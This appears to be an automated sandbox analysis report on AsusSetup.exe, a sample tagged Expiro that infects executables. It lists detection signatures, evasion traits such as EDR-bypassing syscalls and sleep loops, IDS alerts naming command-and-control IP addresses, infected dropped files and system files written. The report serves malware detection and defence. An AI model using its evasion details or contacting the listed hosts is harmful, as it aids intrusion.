Windows Analysis Report
AsusSetup.exe

Overview

General Information

Sample name: AsusSetup.exe
Analysis ID: 1543957
MD5: 13bf2819401d2f983fff90c1960831b8
SHA1: 0b8058088b47edbcf963ac2ac7d5b23fa35e0e90
SHA256: 7db9ca7dbe9a5724ef452585280e73a1a73563cc6a2559f2588d613454f70261
Tags: exe, Expiro, user-lschab
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionality to behave differently if execute on a Russian/Kazak computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries random domain names (often used to prevent blacklisting and sinkholes)
Binary contains a suspicious time stamp
Connects to many different domains
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Executes massive DNS lookups (> 100)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AsusSetup.exe (PID: 5880 cmdline: "C:\Users\user\Desktop\AsusSetup.exe" MD5: 13BF2819401D2F983FFF90C1960831B8)
  • armsvc.exe (PID: 4308 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 828741995F05BE2FD6B071628F96F6B9)
  • alg.exe (PID: 2636 cmdline: C:\Windows\System32\alg.exe MD5: 332F38054E08BAEC551611993C8D1317)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 3364 cmdline: C:\Windows\system32\AppVClient.exe MD5: 2148D94316FBFFE84543113C6A3C1FA4)
  • FXSSVC.exe (PID: 6972 cmdline: C:\Windows\system32\fxssvc.exe MD5: 5E3D1E384655DE6087F47BBB3A38FB17)
  • elevation_service.exe (PID: 7272 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 02A39F6A65834451980F9B1EE3EA62AA)
  • maintenanceservice.exe (PID: 7320 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 8692348A40AAA0C027003BE9DA09E432)
  • cleanup
No configs have been found
No yara matches
Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-28T16:52:07.869496+0100 | 2051654 | 1 | A Network Trojan was detected | 192.168.2.5 | 55131 | 1.1.1.1 | 53 | UDP
2024-10-28T16:51:41.621440+0100 | 2051651 | 1 | A Network Trojan was detected | 192.168.2.5 | 53826 | 1.1.1.1 | 53 | UDP
2024-10-28T16:52:01.565340+0100 | 2051653 | 1 | A Network Trojan was detected | 192.168.2.5 | 53034 | 1.1.1.1 | 53 | UDP
2024-10-28T16:52:15.882417+0100 | 2051650 | 1 | A Network Trojan was detected | 192.168.2.5 | 58235 | 1.1.1.1 | 53 | UDP
2024-10-28T16:52:38.611879+0100 | 2051652 | 1 | A Network Trojan was detected | 192.168.2.5 | 60710 | 1.1.1.1 | 53 | UDP
2024-10-28T16:50:06.156760+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 64098 | 1.1.1.1 | 53 | UDP
2024-10-28T16:52:55.922346+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 61825 | 1.1.1.1 | 53 | UDP
2024-10-28T16:52:55.944670+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.5 | 61825 | 1.1.1.1 | 53 | UDP
2024-10-28T16:50:04.596830+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 62067 | 1.1.1.1 | 53 | UDP
2024-10-28T16:52:54.306362+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.5 | 53017 | 1.1.1.1 | 53 | UDP
2024-10-28T16:50:00.848951+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49705 | TCP
2024-10-28T16:50:02.388480+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49707 | TCP
2024-10-28T16:50:04.593285+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-28T16:50:43.727257+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 49919 | TCP
2024-10-28T16:50:45.659876+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 49930 | TCP
2024-10-28T16:50:51.190177+0100 | 2018141 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 49966 | TCP
2024-10-28T16:50:52.166217+0100 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 49975 | TCP
2024-10-28T16:50:58.470918+0100 | 2018141 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 50002 | TCP
2024-10-28T16:50:59.362254+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 50003 | TCP
2024-10-28T16:51:04.096495+0100 | 2018141 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 50006 | TCP
2024-10-28T16:51:12.188937+0100 | 2018141 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.5 | 50012 | TCP
2024-10-28T16:51:26.049079+0100 | 2018141 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.5 | 50023 | TCP
2024-10-28T16:50:00.848951+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49705 | TCP
2024-10-28T16:50:02.388480+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.5 | 49707 | TCP
2024-10-28T16:50:04.593285+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.5 | 49711 | TCP
2024-10-28T16:50:43.727257+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.5 | 49919 | TCP
2024-10-28T16:50:45.659876+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.5 | 49930 | TCP
2024-10-28T16:50:51.190177+0100 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.5 | 49966 | TCP
2024-10-28T16:50:52.166217+0100 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.5 | 49975 | TCP
2024-10-28T16:50:58.470918+0100 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.5 | 50002 | TCP
2024-10-28T16:50:59.362254+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.5 | 50003 | TCP
2024-10-28T16:51:04.096495+0100 | 2037771 | 1 | A Network Trojan was detected | 34.211.97.45 | 80 | 192.168.2.5 | 50006 | TCP
2024-10-28T16:51:12.188937+0100 | 2037771 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.5 | 50012 | TCP
2024-10-28T16:51:26.049079+0100 | 2037771 | 1 | A Network Trojan was detected | 3.254.94.185 | 80 | 192.168.2.5 | 50023 | TCP
2024-10-28T16:50:03.407124+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 44.221.84.105 | 80 | TCP
2024-10-28T16:51:12.183078+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50012 | 18.246.231.120 | 80 | TCP
2024-10-28T16:52:12.523104+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50068 | 18.208.156.248 | 80 | TCP

AV Detection

Source: AsusSetup.exe, Avira: detected
Avira: detection malicious, Label: W32/Infector.Gen, for each of the following dropped files:
  • C:\Program Files (x86)\AutoIt3\Au3Check.exe
  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
  • C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
  • C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
  • C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
  • C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
  • C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
  • C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
  • C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
  • C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
  • C:\Program Files (x86)\AutoIt3\Au3Info.exe
  • C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
  • C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
  • C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
  • C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
  • C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
  • C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
  • C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
  • C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
  • C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
  • C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
  • C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
  • C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
  • C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
  • C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
  • C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
  • C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: AsusSetup.exe, ReversingLabs: Detection: 73%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
Joe Sandbox ML: detected, for each of the dropped files listed under Avira above and for AsusSetup.exe.
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: AsusSetup.exe, 00000000.00000003.2150436994.0000000003080000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000003.00000003.2331276660.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb source: OSPPREARM.EXE.3.dr
Source: Binary string: MicrosoftEdgeUpdateBroker_unsigned.pdb source: MicrosoftEdgeUpdateBroker.exe.3.dr
Source: Binary string: D:\GitSourceCode\AsTaskSched\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: crashreporter.pdb source: alg.exe, 00000003.00000003.2690809228.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: plugin-container.pdb source: alg.exe, 00000003.00000003.2861757838.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, plugin-container.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: F:\SourceCodeTB\SCD_AutoRunSource\AsusSetup\x64\Release\AsusSetup.pdb source: AsusSetup.exe
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\GitSourceCode\AsTaskSched\x64\Release\AsTaskSched.pdb source: AsusSetup.exe
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pingsender.pdb source: alg.exe, 00000003.00000003.2834736372.0000000001450000.00000004.00001000.00020000.00000000.sdmp, pingsender.exe.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000003.00000003.2344856295.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000003.00000003.2253031986.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000003.00000003.2497425619.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2490830927.0000000001540000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2489526924.0000000001530000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000003.00000003.2307813796.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000003.00000003.2246078357.0000000001610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000003.00000003.2526934752.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2530818713.00000000016C0000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source: Binary string: msdtcexe.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2419515500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000003.00000003.2517356706.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000003.00000003.2407189666.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000003.00000003.2366770450.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000003.00000003.2757514944.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000003.00000003.2441312172.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: alg.exe, 00000003.00000003.2881778104.0000000000470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000003.00000003.2380164583.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\ktab_objs\ktab.pdb source: ktab.exe.3.dr
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: chrome_pwa_launcher.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000003.00000003.2437526500.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: AsusSetup.exe, 00000000.00000003.2191928065.0000000002B40000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2772620436.0000000001470000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000003.00000003.2451910893.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2446761118.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: minidump-analyzer.pdb source: alg.exe, 00000003.00000003.2814896754.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_proxy.exe.pdb source: alg.exe, 00000003.00000003.2678114905.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msdtcexe.pdb source: AsusSetup.exe, 00000000.00000003.2202176160.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: AsusSetup.exe, 00000000.00000003.2170806600.0000000002B40000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: AsusSetup.exe, 00000000.00000003.2154306275.0000000002B00000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: AsusSetup.exe, 00000000.00000003.2178500050.0000000002B00000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2204155544.00000000016B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000003.00000003.2260700730.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: default-browser-agent.pdb source: alg.exe, 00000003.00000003.2739562117.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb source: alg.exe, 00000003.00000003.2917096647.00000000004A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000003.00000003.2411283042.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe.3.dr
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000003.00000003.2385765536.0000000001540000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000003.00000003.2513914889.00000000016C0000.00000004.00001000.00020000.00000000.sdmp

Spreading

Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Users\user\Desktop\AsusSetup.exe, System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\Desktop\AsusSetup.exe, System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe, System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
